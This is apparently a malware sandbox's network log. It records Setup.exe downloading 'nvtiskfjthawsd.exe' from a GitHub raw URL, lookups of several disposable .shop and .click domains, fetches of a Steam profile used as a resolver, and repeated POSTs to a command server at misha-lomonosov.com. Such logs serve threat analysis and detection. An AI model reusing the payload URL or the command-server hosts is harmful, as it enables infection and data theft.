                                    Strict-Transport-Security: max-age=31536000
                                    X-Content-Type-Options: nosniff
                                    X-Frame-Options: deny
                                    X-XSS-Protection: 1; mode=block
                                    X-GitHub-Request-Id: DDCE:3189D4:4962BE:6291B8:6784406B
                                    Accept-Ranges: bytes
                                    Date: Sun, 12 Jan 2025 22:21:32 GMT
                                    Via: 1.1 varnish
                                    X-Served-By: cache-lcy-eglc8600079-LCY
                                    X-Cache: MISS
                                    X-Cache-Hits: 0
                                    X-Timer: S1736720492.461369,VS0,VE154
                                    Vary: Authorization,Accept-Encoding,Origin
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    X-Fastly-Request-ID: dde1afedc9b7c150db71eeb2e93888dd6d64f488
                                    Expires: Sun, 12 Jan 2025 22:26:32 GMT
                                    Source-Age: 0
                                  • flag-us
                                    GET
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    185.199.111.133:443
                                    Request
                                    GET /arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: raw.githubusercontent.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Connection: keep-alive
                                    Content-Length: 1280512
                                    Cache-Control: max-age=300
                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                    Content-Type: application/octet-stream
                                    ETag: "aa32dfd7939370a3576a4217cc533f09f4cd2cc2fdc222913611038268418b02"
                                    Strict-Transport-Security: max-age=31536000
                                    X-Content-Type-Options: nosniff
                                    X-Frame-Options: deny
                                    X-XSS-Protection: 1; mode=block
                                    X-GitHub-Request-Id: 914D:519B9:4AA7DF:63D72D:6784406C
                                    Accept-Ranges: bytes
                                    Date: Sun, 12 Jan 2025 22:21:33 GMT
                                    Via: 1.1 varnish
                                    X-Served-By: cache-lon4224-LON
                                    X-Cache: MISS
                                    X-Cache-Hits: 0
                                    X-Timer: S1736720494.635436,VS0,VE98
                                    Vary: Authorization,Accept-Encoding,Origin
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    X-Fastly-Request-ID: a2b060eb962373797d28c38501df7b1b275fd679
                                    Expires: Sun, 12 Jan 2025 22:26:33 GMT
                                    Source-Age: 0
                                  • flag-gb
                                    GET
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    20.26.156.215:443
                                    Request
                                    GET /arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: github.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 302 Found
                                    Server: GitHub.com
                                    Date: Sun, 12 Jan 2025 22:21:30 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                    Access-Control-Allow-Origin:
                                    Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Cache-Control: no-cache
                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                    X-Frame-Options: deny
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    Referrer-Policy: no-referrer-when-downgrade
                                    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                    Content-Length: 0
                                    X-GitHub-Request-Id: DF22:80ED0:1E72DEE:2526196:6784406F
                                  • flag-us
                                    GET
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    185.199.111.133:443
                                    Request
                                    GET /arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: raw.githubusercontent.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Connection: keep-alive
                                    Content-Length: 1280512
                                    Cache-Control: max-age=300
                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                    Content-Type: application/octet-stream
                                    ETag: "aa32dfd7939370a3576a4217cc533f09f4cd2cc2fdc222913611038268418b02"
                                    Strict-Transport-Security: max-age=31536000
                                    X-Content-Type-Options: nosniff
                                    X-Frame-Options: deny
                                    X-XSS-Protection: 1; mode=block
                                    X-GitHub-Request-Id: DDCE:3189D4:4962BE:6291B8:6784406B
                                    Accept-Ranges: bytes
                                    Date: Sun, 12 Jan 2025 22:21:36 GMT
                                    Via: 1.1 varnish
                                    X-Served-By: cache-lcy-eglc8600049-LCY
                                    X-Cache: HIT
                                    X-Cache-Hits: 1
                                    X-Timer: S1736720496.021352,VS0,VE4
                                    Vary: Authorization,Accept-Encoding,Origin
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    X-Fastly-Request-ID: 94f5790df9e2654dc8ebe71e5ea4fdd4000557de
                                    Expires: Sun, 12 Jan 2025 22:26:36 GMT
                                    Source-Age: 3
                                  • flag-us
                                    DNS
                                    cureprouderio.click
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cureprouderio.click
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    cureprouderio.click
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cureprouderio.click
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    nearycrepso.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    nearycrepso.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    abruptyopsn.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    abruptyopsn.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    wholersorie.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    wholersorie.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    framekgirus.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    framekgirus.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    framekgirus.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    framekgirus.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    tirepublicerj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    tirepublicerj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    tirepublicerj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    tirepublicerj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    noisycuttej.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    noisycuttej.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    noisycuttej.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    noisycuttej.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    rabidcowse.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    rabidcowse.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    rabidcowse.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    rabidcowse.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    cloudewahsj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cloudewahsj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    cloudewahsj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cloudewahsj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    steamcommunity.com
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    steamcommunity.com
                                    IN A
                                    Response
                                    steamcommunity.com
                                    IN A
                                    23.67.133.187
                                  • flag-us
                                    DNS
                                    steamcommunity.com
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    steamcommunity.com
                                    IN A
                                    Response
                                    steamcommunity.com
                                    IN A
                                    23.67.133.187
                                  • flag-de
                                    GET
                                    https://steamcommunity.com/profiles/76561199724331900
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    23.67.133.187:443
                                    Request
                                    GET /profiles/76561199724331900 HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Host: steamcommunity.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    Cache-Control: no-cache
                                    Date: Sun, 12 Jan 2025 22:21:37 GMT
                                    Content-Length: 35608
                                    Connection: keep-alive
                                    Set-Cookie: sessionid=7459132e113cfdfe4511a77b; Path=/; Secure; SameSite=None
                                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                  • flag-de
                                    GET
                                    https://steamcommunity.com/profiles/76561199724331900
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    23.67.133.187:443
                                    Request
                                    GET /profiles/76561199724331900 HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Host: steamcommunity.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    Cache-Control: no-cache
                                    Date: Sun, 12 Jan 2025 22:21:37 GMT
                                    Content-Length: 35608
                                    Connection: keep-alive
                                    Set-Cookie: sessionid=a960dcbf1e793358feb28fd4; Path=/; Secure; SameSite=None
                                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                  • flag-de
                                    GET
                                    https://steamcommunity.com/profiles/76561199724331900
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    23.67.133.187:443
                                    Request
                                    GET /profiles/76561199724331900 HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Host: steamcommunity.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    Cache-Control: no-cache
                                    Date: Sun, 12 Jan 2025 22:21:38 GMT
                                    Content-Length: 35608
                                    Connection: keep-alive
                                    Set-Cookie: sessionid=8b2d82d4ae2118ca8e319829; Path=/; Secure; SameSite=None
                                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                  • flag-us
                                    DNS
                                    misha-lomonosov.com
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    misha-lomonosov.com
                                    IN A
                                    Response
                                    misha-lomonosov.com
                                    IN A
                                    104.21.14.233
                                    misha-lomonosov.com
                                    IN A
                                    172.67.160.193
                                  • flag-us
                                    POST
                                    https://misha-lomonosov.com/api
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    104.21.14.233:443
                                    Request
                                    POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: misha-lomonosov.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 22:21:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: PHPSESSID=nur72a3ruj4pij66a56i5b6p1u; expires=Thu, 08 May 2025 16:08:17 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eLMtYgheNQMQCuFwKiDswzdQDGL2Yyx8ar3xCTZS%2FeOAPTuzGjal4hfgEO4OlcNswqLbAzeomqY%2BZplciwjxOhscJW0LeFTCAu%2F6Nml67Bn6aVjCvMwJp%2BShbMqXhrIWOVNp3TG"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90108a682c8876fc-LHR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=27864&min_rtt=27163&rtt_var=6881&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3305&recv_bytes=611&delivery_rate=138733&cwnd=251&unsent_bytes=0&cid=37fda99e2f5c52e3&ts=217&x=0"
                                  • flag-us
                                    POST
                                    https://misha-lomonosov.com/api
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    104.21.14.233:443
                                    Request
                                    POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: misha-lomonosov.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 22:21:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: PHPSESSID=9njak420gnsoeov35driardjmh; expires=Thu, 08 May 2025 16:08:17 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B3hRVzAS%2BZXh%2FzcvpYYk8VAB11S6nozHmQ4rq77yjj9tw%2B0W97%2BJkdhosEEii2LzE6wOUNMxXJ1vV9gLQqF7H153P%2FwcPUdehPzRe7XXGXUXzRFIVhBnO0gJ0MwHw%2BaaVnk7Ss2M"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90108a682aebf660-LHR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=27437&min_rtt=26654&rtt_var=6859&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3306&recv_bytes=611&delivery_rate=137107&cwnd=253&unsent_bytes=0&cid=fd6b2b14e4db0909&ts=235&x=0"
                                  • flag-de
                                    GET
                                    https://steamcommunity.com/profiles/76561199724331900
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    23.67.133.187:443
                                    Request
                                    GET /profiles/76561199724331900 HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Host: steamcommunity.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    Cache-Control: no-cache
                                    Date: Sun, 12 Jan 2025 22:21:38 GMT
                                    Content-Length: 35608
                                    Connection: keep-alive
                                    Set-Cookie: sessionid=b53de322815b8b09bb631bce; Path=/; Secure; SameSite=None
                                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                  • flag-us
                                    POST
                                    https://misha-lomonosov.com/api
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    104.21.14.233:443
                                    Request
                                    POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: misha-lomonosov.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 22:21:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: PHPSESSID=jh6c0rghefsvo2499efduqu6ja; expires=Thu, 08 May 2025 16:08:17 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qijl6nf0ucmrZCZQvEAkfB1ng2VDDRU0gmqI%2B%2BtwIs40ZgCZtbcxi0c0S2BW88Gu2Ll1SLvLm8aCR76JxKTWnYTD4cvjG9w%2Fjjeh209nRVaXau%2BST%2FtCqN6EiBo%2BKOPUzU9OMtgE"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90108a6a49c6ef50-LHR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=31039&min_rtt=29938&rtt_var=7613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3305&recv_bytes=611&delivery_rate=119707&cwnd=253&unsent_bytes=0&cid=4dbc082334414428&ts=249&x=0"
                                  • flag-us
                                    DNS
                                    187.133.67.23.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    187.133.67.23.in-addr.arpa
                                    IN PTR
                                    Response
                                    187.133.67.23.in-addr.arpa
                                    IN PTR
                                    a23-67-133-187deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    233.14.21.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    233.14.21.104.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    233.14.21.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    233.14.21.104.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    POST
                                    https://misha-lomonosov.com/api
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    104.21.14.233:443
                                    Request
                                    POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: misha-lomonosov.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 22:21:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: PHPSESSID=17j722n6takjratv7dshjomg15; expires=Thu, 08 May 2025 16:08:17 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B8VWvO0MMGRKwjdVdezH0eiDYOdvcZPDcUmGgHI5zqzSCmIM1YYVJ80zq980MOcF5INIvj7Cu1PVE8ckU3BJcQIfh%2B494ErzjoPC0wfThmFR0N7O5b11jjHvT2SfoMEPSKx9kWC9"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90108a6d0aeebd7d-LHR
                                    alt-svc: h3=":443"; ma=86400
